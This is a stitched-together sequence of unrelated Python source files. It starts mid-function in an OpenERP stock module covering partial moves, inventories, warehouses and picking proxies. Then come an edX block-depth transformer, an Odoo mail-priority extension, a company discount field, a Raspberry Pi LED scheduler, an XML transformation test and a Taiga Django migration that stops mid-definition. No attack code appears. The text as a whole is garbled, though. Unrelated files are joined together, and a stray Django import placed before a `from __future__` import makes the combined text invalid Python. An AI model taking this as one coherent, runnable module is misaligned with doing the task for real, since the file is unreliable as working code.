                update_val['product_qty'] = quantity_rest
                update_val['product_uos_qty'] = uos_qty_rest
                self.write(cr, uid, [move.id], update_val)

            else:
                # fully consumed: the original move itself is consumed as-is
                quantity_rest = quantity
                uos_qty_rest =  uos_qty
                res += [move.id]
                update_val = {
                        'product_qty' : quantity_rest,
                        'product_uos_qty' : uos_qty_rest,
                        'location_id': location_id or move.location_id.id,
                }
                self.write(cr, uid, [move.id], update_val)

        self.action_done(cr, uid, res, context=context)

        return res

    # FIXME: needs refactoring, this code is partially duplicated in stock_picking.do_partial()!
    def do_partial(self, cr, uid, ids, partial_datas, context=None):
        """ Makes partial pickings and moves done.
        @param partial_datas: Dictionary containing details of partial picking
                          like partner_id, delivery_date, delivery
                          moves with product_id, product_qty, uom
        @return: list of ids of the moves that were processed to completion
        """
        res = {}
        picking_obj = self.pool.get('stock.picking')
        product_obj = self.pool.get('product.product')
        currency_obj = self.pool.get('res.currency')
        uom_obj = self.pool.get('product.uom')
        wf_service = netsvc.LocalService("workflow")

        if context is None:
            context = {}

        # classify each move by comparing its planned qty to the qty actually processed
        complete, too_many, too_few = [], [], []
        move_product_qty = {}
        prodlot_ids = {}
        for move in self.browse(cr, uid, ids, context=context):
            if move.state in ('done', 'cancel'):
                # already finalized: nothing to process
                continue
            partial_data = partial_datas.get('move%s'%(move.id), False)
            assert partial_data, _('Missing partial picking data for move #%s.') % (move.id)
            product_qty = partial_data.get('product_qty',0.0)
            move_product_qty[move.id] = product_qty
            product_uom = partial_data.get('product_uom',False)
            product_price = partial_data.get('product_price',0.0)
            product_currency = partial_data.get('product_currency',False)
            prodlot_ids[move.id] = partial_data.get('prodlot_id')
            if move.product_qty == product_qty:
                complete.append(move)
            elif move.product_qty > product_qty:
                too_few.append(move)
            else:
                too_many.append(move)

            # Average price computation
            if (move.picking_id.type == 'in') and (move.product_id.cost_method == 'average'):
                product = product_obj.browse(cr, uid, move.product_id.id)
                move_currency_id = move.company_id.currency_id.id
                context['currency_id'] = move_currency_id
                qty = uom_obj._compute_qty(cr, uid, product_uom, product_qty, product.uom_id.id)
                if qty > 0:
                    # convert the wizard price into company currency and the product's stock UoM
                    new_price = currency_obj.compute(cr, uid, product_currency,
                            move_currency_id, product_price, round=False)
                    new_price = uom_obj._compute_price(cr, uid, product_uom, new_price,
                            product.uom_id.id)
                    if product.qty_available <= 0:
                        new_std_price = new_price
                    else:
                        # Get the standard price
                        amount_unit = product.price_get('standard_price', context=context)[product.id]
                        # weighted average of on-hand stock and the incoming quantity
                        new_std_price = ((amount_unit * product.qty_available)\
                            + (new_price * qty))/(product.qty_available + qty)

                    product_obj.write(cr, uid, [product.id],{'standard_price': new_std_price})

                    # Record the values that were chosen in the wizard, so they can be
                    # used for inventory valuation if real-time valuation is enabled.
                    self.write(cr, uid, [move.id],
                                {'price_unit': product_price,
                                 'price_currency_id': product_currency,
                                })

        # partially processed moves: split off the processed part into a new 'assigned' move
        for move in too_few:
            product_qty = move_product_qty[move.id]
            if product_qty != 0:
                defaults = {
                            'product_qty' : product_qty,
                            'product_uos_qty': product_qty,
                            'picking_id' : move.picking_id.id,
                            'state': 'assigned',
                            'move_dest_id': False,
                            'price_unit': move.price_unit,
                            }
                prodlot_id = prodlot_ids[move.id]
                if prodlot_id:
                    defaults.update(prodlot_id=prodlot_id)
                new_move = self.copy(cr, uid, move.id, defaults)
                complete.append(self.browse(cr, uid, new_move))
            # NOTE(review): product_uos_qty is decreased by the UoM quantity with no
            # UoS conversion -- verify for products whose UoS differs from their UoM
            self.write(cr, uid, [move.id],
                    {
                        'product_qty': move.product_qty - product_qty,
                        'product_uos_qty': move.product_qty - product_qty,
                        'prodlot_id': False,
                        'tracking_id': False,
                    })


        # moves processed beyond the planned quantity are kept at their planned qty
        for move in too_many:
            self.write(cr, uid, [move.id],
                    {
                        'product_qty': move.product_qty,
                        'product_uos_qty': move.product_qty,
                    })
            complete.append(move)

        for move in complete:
            if prodlot_ids.get(move.id):
                self.write(cr, uid, [move.id],{'prodlot_id': prodlot_ids.get(move.id)})
            self.action_done(cr, uid, [move.id], context=context)
            if  move.picking_id.id :
                # TOCHECK : Done picking if all moves are done
                cr.execute("""
                    SELECT move.id FROM stock_picking pick
                    RIGHT JOIN stock_move move ON move.picking_id = pick.id AND move.state = %s
                    WHERE pick.id = %s""",
                            ('done', move.picking_id.id))
                res = cr.fetchall()
                if len(res) == len(move.picking_id.move_lines):
                    picking_obj.action_move(cr, uid, [move.picking_id.id])
                    wf_service.trg_validate(uid, 'stock.picking', move.picking_id.id, 'button_done', cr)

        return [move.id for move in complete]

# old-style OpenERP registration: instantiating the osv class registers the model in the pool
stock_move()

class stock_inventory(osv.osv):
    """Physical inventory.

    Holds counted quantities per product/location and, once confirmed,
    generates the stock moves that align the theoretical stock levels with
    the counted quantities.
    """
    _name = "stock.inventory"
    _description = "Inventory"
    _columns = {
        'name': fields.char('Inventory Reference', size=64, required=True, readonly=True, states={'draft': [('readonly', False)]}),
        'date': fields.datetime('Creation Date', required=True, readonly=True, states={'draft': [('readonly', False)]}),
        'date_done': fields.datetime('Date done'),
        'inventory_line_id': fields.one2many('stock.inventory.line', 'inventory_id', 'Inventories', readonly=True, states={'draft': [('readonly', False)]}),
        'move_ids': fields.many2many('stock.move', 'stock_inventory_move_rel', 'inventory_id', 'move_id', 'Created Moves'),
        'state': fields.selection( (('draft', 'Draft'), ('cancel','Cancelled'), ('confirm','Confirmed'), ('done', 'Done')), 'Status', readonly=True, select=True),
        'company_id': fields.many2one('res.company', 'Company', required=True, select=True, readonly=True, states={'draft':[('readonly',False)]}),

    }
    _defaults = {
        'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
        'state': 'draft',
        'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.inventory', context=c)
    }

    def copy(self, cr, uid, id, default=None, context=None):
        """Duplicate an inventory without its generated moves or done date."""
        if default is None:
            default = {}
        default = default.copy()
        default.update({'move_ids': [], 'date_done': False})
        return super(stock_inventory, self).copy(cr, uid, id, default, context=context)

    def _inventory_line_hook(self, cr, uid, inventory_line, move_vals):
        """ Creates a stock move from an inventory line
        @param inventory_line: browse record of the stock.inventory.line (hook point for overrides)
        @param move_vals: values used to create the stock.move
        @return: id of the created stock.move
        """
        return self.pool.get('stock.move').create(cr, uid, move_vals)

    def action_done(self, cr, uid, ids, context=None):
        """ Finish the inventory: process its generated moves and stamp the done date.
        @return: True
        """
        if context is None:
            context = {}
        move_obj = self.pool.get('stock.move')
        for inv in self.browse(cr, uid, ids, context=context):
            move_obj.action_done(cr, uid, [x.id for x in inv.move_ids], context=context)
            self.write(cr, uid, [inv.id], {'state':'done', 'date_done': time.strftime('%Y-%m-%d %H:%M:%S')}, context=context)
        return True

    def action_confirm(self, cr, uid, ids, context=None):
        """ Confirm the inventory: create the corrective stock moves and confirm them.
        @return: True
        """
        if context is None:
            context = {}
        # to perform the correct inventory corrections we need analyze stock location by
        # location, never recursively, so we use a special context
        product_context = dict(context, compute_child=False)

        location_obj = self.pool.get('stock.location')
        for inv in self.browse(cr, uid, ids, context=context):
            move_ids = []
            for line in inv.inventory_line_id:
                pid = line.product_id.id
                product_context.update(uom=line.product_uom.id, to_date=inv.date, date=inv.date, prodlot_id=line.prod_lot_id.id)
                # theoretical quantity at that location at the inventory date
                amount = location_obj._product_get(cr, uid, line.location_id.id, [pid], product_context)[pid]
                change = line.product_qty - amount
                lot_id = line.prod_lot_id.id
                if change:
                    location_id = line.product_id.property_stock_inventory.id
                    value = {
                        'name': _('INV:') + (line.inventory_id.name or ''),
                        'product_id': line.product_id.id,
                        'product_uom': line.product_uom.id,
                        'prodlot_id': lot_id,
                        'date': inv.date,
                    }

                    if change > 0:
                        # surplus: move from the product's inventory-loss location into stock
                        value.update( {
                            'product_qty': change,
                            'location_id': location_id,
                            'location_dest_id': line.location_id.id,
                        })
                    else:
                        # shortage: move from stock to the product's inventory-loss location
                        value.update( {
                            'product_qty': -change,
                            'location_id': line.location_id.id,
                            'location_dest_id': location_id,
                        })
                    move_ids.append(self._inventory_line_hook(cr, uid, line, value))
            self.write(cr, uid, [inv.id], {'state': 'confirm', 'move_ids': [(6, 0, move_ids)]})
            self.pool.get('stock.move').action_confirm(cr, uid, move_ids, context=context)
        return True

    def action_cancel_draft(self, cr, uid, ids, context=None):
        """ Cancels the stock move and change inventory state to draft.
        @return: True
        """
        for inv in self.browse(cr, uid, ids, context=context):
            self.pool.get('stock.move').action_cancel(cr, uid, [x.id for x in inv.move_ids], context=context)
            self.write(cr, uid, [inv.id], {'state':'draft'}, context=context)
        return True

    def action_cancel_inventory(self, cr, uid, ids, context=None):
        """ Cancels both stock move and inventory
        @return: True
        @raise osv.except_osv: if a related journal entry is already posted
        """
        move_obj = self.pool.get('stock.move')
        account_move_obj = self.pool.get('account.move')
        for inv in self.browse(cr, uid, ids, context=context):
            move_obj.action_cancel(cr, uid, [x.id for x in inv.move_ids], context=context)
            for move in inv.move_ids:
                 # account moves sharing the stock move's name are removed as well
                 # (presumably the valuation entries); posted ones block cancellation
                 account_move_ids = account_move_obj.search(cr, uid, [('name', '=', move.name)])
                 if account_move_ids:
                     account_move_data_l = account_move_obj.read(cr, uid, account_move_ids, ['state'], context=context)
                     for account_move in account_move_data_l:
                         if account_move['state'] == 'posted':
                             raise osv.except_osv(_('User Error!'),
                                                  _('In order to cancel this inventory, you must first unpost related journal entries.'))
                         account_move_obj.unlink(cr, uid, [account_move['id']], context=context)
            self.write(cr, uid, [inv.id], {'state': 'cancel'}, context=context)
        return True

# old-style OpenERP registration: instantiating the osv class registers the model in the pool
stock_inventory()

class stock_inventory_line(osv.osv):
    """A single counted product/location entry of a physical inventory."""
    _name = "stock.inventory.line"
    _description = "Inventory Line"
    _rec_name = "inventory_id"
    _columns = {
        'inventory_id': fields.many2one('stock.inventory', 'Inventory', ondelete='cascade', select=True),
        'location_id': fields.many2one('stock.location', 'Location', required=True),
        'product_id': fields.many2one('product.product', 'Product', required=True, select=True),
        'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True),
        'product_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure')),
        'company_id': fields.related('inventory_id','company_id',type='many2one',relation='res.company',string='Company',store=True, select=True, readonly=True),
        'prod_lot_id': fields.many2one('stock.production.lot', 'Serial Number', domain="[('product_id','=',product_id)]"),
        'state': fields.related('inventory_id','state',type='char',string='Status',readonly=True),
    }

    def _default_stock_location(self, cr, uid, context=None):
        """Return the id of the standard Stock location, or False when it is
        missing or not readable by the current user."""
        try:
            location_model, location_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_stock')
            with tools.mute_logger('openerp.osv.orm'):
                # raises except_orm when the user may not read the location
                self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
        except (orm.except_orm, ValueError):
            location_id = False
        return location_id

    _defaults = {
        'location_id': _default_stock_location
    }

    def on_change_product_id(self, cr, uid, ids, location_id, product, uom=False, to_date=False):
        """ Changes UoM and name if product_id changes.
        @param location_id: Location id
        @param product: Changed product_id
        @param uom: UoM product
        @param to_date: date up to which the theoretical quantity is computed
        @return:  Dictionary of changed values
        """
        if not product:
            return {'value': {'product_qty': 0.0, 'product_uom': False, 'prod_lot_id': False}}
        obj_product = self.pool.get('product.product').browse(cr, uid, product)
        uom = uom or obj_product.uom_id.id
        # theoretical quantity at that location, expressed in the chosen UoM
        amount = self.pool.get('stock.location')._product_get(cr, uid, location_id, [product], {'uom': uom, 'to_date': to_date, 'compute_child': False})[product]
        result = {'product_qty': amount, 'product_uom': uom, 'prod_lot_id': False}
        return {'value': result}

# old-style OpenERP registration: instantiating the osv class registers the model in the pool
stock_inventory_line()

#----------------------------------------------------------
# Stock Warehouse
#----------------------------------------------------------
class stock_warehouse(osv.osv):
    """Warehouse: a named triple of input/stock/output locations owned by a company."""
    _name = "stock.warehouse"
    _description = "Warehouse"
    _columns = {
        'name': fields.char('Name', size=128, required=True, select=True),
        'company_id': fields.many2one('res.company', 'Company', required=True, select=True),
        'partner_id': fields.many2one('res.partner', 'Owner Address'),
        'lot_input_id': fields.many2one('stock.location', 'Location Input', required=True, domain=[('usage','<>','view')]),
        'lot_stock_id': fields.many2one('stock.location', 'Location Stock', required=True, domain=[('usage','=','internal')]),
        'lot_output_id': fields.many2one('stock.location', 'Location Output', required=True, domain=[('usage','<>','view')]),
    }

    def _default_lot_input_stock_id(self, cr, uid, context=None):
        """Return the id of the standard Stock location, or False when it is
        missing or not readable by the current user."""
        try:
            lot_input_stock_model, lot_input_stock_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_stock')
            with tools.mute_logger('openerp.osv.orm'):
                self.pool.get('stock.location').check_access_rule(cr, uid, [lot_input_stock_id], 'read', context=context)
        except (ValueError, orm.except_orm):
            # the user does not have read access on the location or it does not exists
            lot_input_stock_id = False
        return lot_input_stock_id

    def _default_lot_output_id(self, cr, uid, context=None):
        """Return the id of the standard Output location, or False when it is
        missing or not readable by the current user."""
        try:
            lot_output_model, lot_output_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_output')
            with tools.mute_logger('openerp.osv.orm'):
                self.pool.get('stock.location').check_access_rule(cr, uid, [lot_output_id], 'read', context=context)
        except (ValueError, orm.except_orm):
            # the user does not have read access on the location or it does not exists
            lot_output_id = False
        return lot_output_id

    _defaults = {
        # BUGFIX: look up the company default under this model's own name;
        # it was copy-pasted as 'stock.inventory' from the inventory model.
        'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.warehouse', context=c),
        # the Input location intentionally shares the Stock location default
        'lot_input_id': _default_lot_input_stock_id,
        'lot_stock_id': _default_lot_input_stock_id,
        'lot_output_id': _default_lot_output_id,
    }

# old-style OpenERP registration: instantiating the osv class registers the model in the pool
stock_warehouse()

#----------------------------------------------------------
# "Empty" classes that specialize the original stock.picking model (which is dedicated to internal pickings)
#   in order to offer a different user experience: different views, labels, and available reports/wizards
#----------------------------------------------------------
class stock_picking_in(osv.osv):
    _name = "stock.picking.in"
    _inherit = "stock.picking"
    _table = "stock_picking"
    _description = "Incoming Shipments"

    # Every entry point below is delegated to the concrete stock.picking
    # model: this class shares the stock_picking table and only exists to
    # give incoming shipments their own views, labels, reports and wizards.

    def search(self, cr, user, args, offset=0, limit=None, order=None, context=None, count=False):
        picking_model = self.pool.get('stock.picking')
        return picking_model.search(cr, user, args, offset, limit, order, context, count)

    def read(self, cr, uid, ids, fields=None, context=None, load='_classic_read'):
        picking_model = self.pool.get('stock.picking')
        return picking_model.read(cr, uid, ids, fields=fields, context=context, load=load)

    def check_access_rights(self, cr, uid, operation, raise_exception=True):
        # access rights are those of the underlying stock.picking object
        picking_model = self.pool.get('stock.picking')
        return picking_model.check_access_rights(cr, uid, operation, raise_exception=raise_exception)

    def check_access_rule(self, cr, uid, ids, operation, context=None):
        # access rules are those of the underlying stock.picking object
        picking_model = self.pool.get('stock.picking')
        return picking_model.check_access_rule(cr, uid, ids, operation, context=context)

    def _workflow_trigger(self, cr, uid, ids, trigger, context=None):
        # trigger the stock.picking workflow at the end of create/write/unlink,
        # since stock.picking.in has no workflow of its own
        picking_model = self.pool.get('stock.picking')
        return picking_model._workflow_trigger(cr, uid, ids, trigger, context=context)

    def _workflow_signal(self, cr, uid, ids, signal, context=None):
        # fire the signal on the stock.picking workflow instance,
        # since stock.picking.in has no workflow of its own
        picking_model = self.pool.get('stock.picking')
        return picking_model._workflow_signal(cr, uid, ids, signal, context=context)

    def message_post(self, *args, **kwargs):
        """Post the message on stock.picking so it shows up in the form view chatter."""
        return self.pool.get('stock.picking').message_post(*args, **kwargs)

    def message_subscribe(self, *args, **kwargs):
        """Subscribe through the stock.picking model, which uses _name in the request."""
        return self.pool.get('stock.picking').message_subscribe(*args, **kwargs)

    def message_unsubscribe(self, *args, **kwargs):
        """Unsubscribe through the stock.picking model, mirroring message_subscribe."""
        return self.pool.get('stock.picking').message_unsubscribe(*args, **kwargs)

    def default_get(self, cr, uid, fields_list, context=None):
        # start from the stock.picking defaults, then let any defaults defined
        # specifically on stock.picking.in take precedence
        merged = self.pool['stock.picking'].default_get(cr, uid, fields_list, context=context)
        merged.update(super(stock_picking_in, self).default_get(cr, uid, fields_list, context=context))
        return merged

    _columns = {
        'backorder_id': fields.many2one('stock.picking.in', 'Back Order of', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="If this shipment was split, then this field links to the shipment which contains the already processed part.", select=True),
        'state': fields.selection(
            [('draft', 'Draft'),
            ('auto', 'Waiting Another Operation'),
            ('confirmed', 'Waiting Availability'),
            ('assigned', 'Ready to Receive'),
            ('done', 'Received'),
            ('cancel', 'Cancelled'),],
            'Status', readonly=True, select=True,
            help="""* Draft: not confirmed yet and will not be scheduled until confirmed\n
                 * Waiting Another Operation: waiting for another move to proceed before it becomes automatically available (e.g. in Make-To-Order flows)\n
                 * Waiting Availability: still waiting for the availability of products\n
                 * Ready to Receive: products reserved, simply waiting for confirmation.\n
                 * Received: has been processed, can't be modified or cancelled anymore\n
                 * Cancelled: has been cancelled, can't be confirmed anymore"""),
    }
    _defaults = {
        'type': 'in',
    }

class stock_picking_out(osv.osv):
    """Delivery-order (outgoing shipment) proxy over stock.picking.

    Shares the stock_picking table and delegates ORM access, workflow and
    mail/chatter operations to the stock.picking model so that records stay
    consistent between the generic and the delivery-specific views.
    """
    _name = "stock.picking.out"
    _inherit = "stock.picking"
    _table = "stock_picking"
    _description = "Delivery Orders"

    def search(self, cr, user, args, offset=0, limit=None, order=None, context=None, count=False):
        # Delegate so that record rules/domains of stock.picking apply here too.
        return self.pool.get('stock.picking').search(cr, user, args, offset, limit, order, context, count)

    def read(self, cr, uid, ids, fields=None, context=None, load='_classic_read'):
        # Delegate reads to the shared stock.picking model.
        return self.pool.get('stock.picking').read(cr, uid, ids, fields=fields, context=context, load=load)

    def check_access_rights(self, cr, uid, operation, raise_exception=True):
        # Override in order to redirect the check of access rights on the stock.picking object
        return self.pool.get('stock.picking').check_access_rights(cr, uid, operation, raise_exception=raise_exception)

    def check_access_rule(self, cr, uid, ids, operation, context=None):
        # Override in order to redirect the check of access rules on the stock.picking object
        return self.pool.get('stock.picking').check_access_rule(cr, uid, ids, operation, context=context)

    def _workflow_trigger(self, cr, uid, ids, trigger, context=None):
        # Override in order to trigger the workflow of stock.picking at the end of create,
        # write and unlink operations instead of its own workflow (which does not exist).
        return self.pool.get('stock.picking')._workflow_trigger(cr, uid, ids, trigger, context=context)

    def _workflow_signal(self, cr, uid, ids, signal, context=None):
        # Override in order to fire the workflow signal on the given stock.picking workflow
        # instance instead of its own workflow (which does not exist).
        return self.pool.get('stock.picking')._workflow_signal(cr, uid, ids, signal, context=context)

    def message_post(self, *args, **kwargs):
        """Post the message on stock.picking to be able to see it in the form view when using the chatter"""
        return self.pool.get('stock.picking').message_post(*args, **kwargs)

    def message_subscribe(self, *args, **kwargs):
        """Send the subscribe action on stock.picking model as it uses _name in request"""
        return self.pool.get('stock.picking').message_subscribe(*args, **kwargs)

    def message_unsubscribe(self, *args, **kwargs):
        """Send the unsubscribe action on stock.picking model to match with subscribe"""
        return self.pool.get('stock.picking').message_unsubscribe(*args, **kwargs)

    def default_get(self, cr, uid, fields_list, context=None):
        # Merge defaults from stock.picking with possible defaults defined on stock.picking.out;
        # the delivery-specific defaults take precedence.
        defaults = self.pool['stock.picking'].default_get(cr, uid, fields_list, context=context)
        out_defaults = super(stock_picking_out, self).default_get(cr, uid, fields_list, context=context)
        defaults.update(out_defaults)
        return defaults

    # Redeclare shared columns with delivery-specific target model and labels.
    _columns = {
        'backorder_id': fields.many2one('stock.picking.out', 'Back Order of', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="If this shipment was split, then this field links to the shipment which contains the already processed part.", select=True),
        'state': fields.selection(
            [('draft', 'Draft'),
            ('auto', 'Waiting Another Operation'),
            ('confirmed', 'Waiting Availability'),
            ('assigned', 'Ready to Deliver'),
            ('done', 'Delivered'),
            ('cancel', 'Cancelled'),],
            'Status', readonly=True, select=True,
            help="""* Draft: not confirmed yet and will not be scheduled until confirmed\n
                 * Waiting Another Operation: waiting for another move to proceed before it becomes automatically available (e.g. in Make-To-Order flows)\n
                 * Waiting Availability: still waiting for the availability of products\n
                 * Ready to Deliver: products reserved, simply waiting for confirmation.\n
                 * Delivered: has been processed, can't be modified or cancelled anymore\n
                 * Cancelled: has been cancelled, can't be confirmed anymore"""),
    }
    # Records created through this proxy model are outgoing shipments.
    _defaults = {
        'type': 'out',
    }

# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:

from django import forms

# future use
"""
Block Depth Transformer
"""
from __future__ import absolute_import

from openedx.core.djangoapps.content.block_structure.transformer import BlockStructureTransformer


class BlockDepthTransformer(BlockStructureTransformer):
    """
    Annotates every block in the structure with its depth, defined as the
    shortest distance from a root (a DAG node reachable by several paths
    gets the shallowest depth).  When a requested_depth is supplied, blocks
    deeper than that are pruned from the traversal.
    """
    WRITE_VERSION = 1
    READ_VERSION = 1
    BLOCK_DEPTH = 'block_depth'

    def __init__(self, requested_depth=None):
        self.requested_depth = requested_depth

    @classmethod
    def name(cls):
        return "blocks_api:block_depth"

    @classmethod
    def get_block_depth(cls, block_structure, block_key):
        """
        Look up the depth previously stored for a block.

        Arguments:
            block_structure: a BlockStructure instance
            block_key: the key of the block whose depth we want to know

        Returns:
            int
        """
        return block_structure.get_transformer_block_field(
            block_key, cls, cls.BLOCK_DEPTH,
        )

    def transform(self, usage_info, block_structure):
        """
        Record each block's depth on block_structure, then optionally prune
        blocks deeper than the requested depth.
        """
        for key in block_structure.topological_traversal():
            parent_keys = block_structure.get_parents(key)
            if parent_keys:
                # Shallowest parent + 1: topological order guarantees
                # every parent's depth is already set.
                depth = 1 + min(
                    self.get_block_depth(block_structure, parent)
                    for parent in parent_keys
                )
            else:
                depth = 0
            block_structure.set_transformer_block_field(
                key, self, self.BLOCK_DEPTH, depth,
            )

        if self.requested_depth is not None:
            block_structure.remove_block_traversal(
                lambda key: self.get_block_depth(block_structure, key) > self.requested_depth
            )

# Copyright 2018 ACSONE SA/NV
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import ast
from odoo import api, exceptions, models, _


class MailComposeMessage(models.TransientModel):
    _inherit = 'mail.compose.message'

    @api.model
    def _get_priorities(self):
        """
        Read the priority thresholds configured in the
        'mail.sending.job.priorities' system parameter.
        :return: dict
        """
        param_key = 'mail.sending.job.priorities'
        try:
            priorities = ast.literal_eval(
                self.env['ir.config_parameter'].sudo().get_param(
                    param_key, default='{}'))
        # Re-raise parse failures as a user-readable error
        except (ValueError, SyntaxError):
            raise exceptions.UserError(
                _("Error to load the system parameter (%s) "
                  "of priorities") % param_key)
        # literal_eval accepts any Python literal; make sure the parameter
        # really holds a dict before using it
        if not isinstance(priorities, dict):
            raise exceptions.UserError(
                _("Error to load the system parameter (%s) of priorities.\n"
                  "Invalid dictionary") % param_key)
        return priorities

    @api.multi
    def send_mail(self, auto_commit=False):
        """
        Inject a priority (taken from configuration) into the context so it
        is applied to the subsequently generated mail.mail records.
        :return: dict/action
        """
        ctx = self.env.context
        record_ids = ctx.get('active_ids')
        if record_ids and not ctx.get('default_mail_job_priority'):
            priorities = self._get_priorities()
            batch_size = len(record_ids)
            # Thresholds not exceeding the batch size; the largest one wins.
            thresholds = [threshold for threshold in priorities if threshold <= batch_size]
            if thresholds:
                priority = priorities.get(max(thresholds))
                self = self.with_context(default_mail_job_priority=priority)
        return super().send_mail(auto_commit=auto_commit)

# -*- encoding: utf-8 -*-
##############################################################################
#
#    res_partner
#    Copyright (c) 2013 Codeback Software S.L. (http://codeback.es)    
#    @author: Miguel García <miguel@codeback.es>
#    @author: Javier Fuentes <javier@codeback.es>
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

from osv import fields, osv
from datetime import datetime, timedelta
from openerp.tools.translate import _

class res_company(osv.osv):
    """Extend res.company with the new web-discount field."""

    _name = "res.company"
    _inherit = "res.company"

    _columns = {
        # Discount percentage applied on the web shop (label kept in Spanish:
        # "Descuento web (%)" is a user-visible runtime string).
        'web_discount': fields.float('Descuento web (%)'),
    }

# Copyright (c) 2016 Sebastian Kanis
# This file is part of pi-led-control.

# pi-led-control is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# pi-led-control is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with pi-led-control.  If not, see <http://www.gnu.org/licenses/>.

import datetime
import logging

from server.programs.abstractprogram import AbstractProgram


class ScheduledProgram(AbstractProgram):
    """Wraps another program and delays its run until a fixed time of day.

    timeOfDay is expressed in seconds since midnight; if that moment has
    already passed today, the wait rolls over to the same time tomorrow.
    """

    def __init__(self, program, timeOfDay):
        super().__init__()
        self._program = program
        self._timeOfDay = timeOfDay

    def run(self):
        now = datetime.datetime.now()
        elapsedToday = (now.hour * 60 + now.minute) * 60 + now.second
        delta = self._timeOfDay - elapsedToday
        # If the scheduled moment is not strictly in the future, wait until
        # the same time on the next day.
        sleepDuration = delta if delta > 0 else delta + 24 * 3600
        logging.getLogger("main").info("sleeping for " + str(sleepDuration) + " seconds")
        self._waitIfNotStopped(sleepDuration)
        self._program.run()

    def setThreadStopEvent(self, threadStopEvent):
        # Propagate the stop event to the wrapped program as well.
        self.threadStopEvent = threadStopEvent
        self._program.setThreadStopEvent(threadStopEvent)

    def setColorSetter(self, colorSetter):
        # Propagate the color setter to the wrapped program as well.
        self._colorSetter = colorSetter
        self._program.setColorSetter(colorSetter)

    def getCurrentColor(self):
        return self._program.getCurrentColor()

    def setLastColor(self, lastColor):
        self._program.setLastColor(lastColor)

from pathlib import Path

from inxs.cli import main as _main

from tests import equal_documents


def main(*args):
    """Invoke the inxs CLI, converting any Path arguments to plain strings."""
    _main(tuple(str(arg) if isinstance(arg, Path) else arg for arg in args))


# TODO case-study with this use-case
def test_mods_to_tei(datadir):
    """Transform the MODS sample in place and compare it to the expected TEI."""
    transformation = datadir / "mods_to_tei.py"
    document = datadir / "mods_to_tei.xml"
    main("--inplace", transformation, document)
    assert equal_documents(document, datadir / "mods_to_tei_exp.xml")

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations
from django.conf import settings
import django_pgjson.fields
import django.utils.timezone
import django.db.models.deletion
import djorm_pgarray.fields
import taiga.projects.history.models


class Migration(migrations.Migration):
    """Initial projects schema: Membership and Project models plus their relations."""

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('users', '0002_auto_20140903_0916'),
    ]

    operations = [
        migrations.CreateModel(
            name='Membership',
            fields=[
                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
                ('is_owner', models.BooleanField(default=False)),
                # email/token support invitations of people without an account yet
                ('email', models.EmailField(max_length=255, null=True, default=None, verbose_name='email', blank=True)),
                ('created_at', models.DateTimeField(default=django.utils.timezone.now, verbose_name='creado el')),
                ('token', models.CharField(max_length=60, null=True, default=None, verbose_name='token', blank=True)),
                ('invited_by_id', models.IntegerField(null=True, blank=True)),
            ],
            options={
                'ordering': ['project', 'user__full_name', 'user__username', 'user__email', 'email'],
                # NOTE(review): 'membershipss' looks like a typo for 'memberships',
                # but this is a historical migration — do not edit it in place.
                'verbose_name_plural': 'membershipss',
                'permissions': (('view_membership', 'Can view membership'),),
                'verbose_name': 'membership',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Project',
            fields=[
                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
                ('tags', djorm_pgarray.fields.TextArrayField(dbtype='text', verbose_name='tags')),
                ('name', models.CharField(max_length=250, unique=True, verbose_name='name')),
                ('slug', models.SlugField(max_length=250, unique=True, verbose_name='slug', blank=True)),
                ('description', models.TextField(verbose_name='description')),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now, verbose_name='created date')),
                ('modified_date', models.DateTimeField(verbose_name='modified date')),
                ('total_milestones', models.IntegerField(null=True, default=0, verbose_name='total of milestones', blank=True)),
                ('total_story_points', models.FloatField(default=0, verbose_name='total story points')),
                # feature toggles for the project's panels
                ('is_backlog_activated', models.BooleanField(default=True, verbose_name='active backlog panel')),
                ('is_kanban_activated', models.BooleanField(default=False, verbose_name='active kanban panel')),
                ('is_wiki_activated', models.BooleanField(default=True, verbose_name='active wiki panel')),
                ('is_issues_activated', models.BooleanField(default=True, verbose_name='active issues panel')),
                ('videoconferences', models.CharField(max_length=250, null=True, choices=[('appear-in', 'AppearIn'), ('talky', 'Talky'), ('jitsi', 'Jitsi')], verbose_name='videoconference system', blank=True)),
                ('videoconferences_salt', models.CharField(max_length=250, null=True, verbose_name='videoconference room salt', blank=True)),
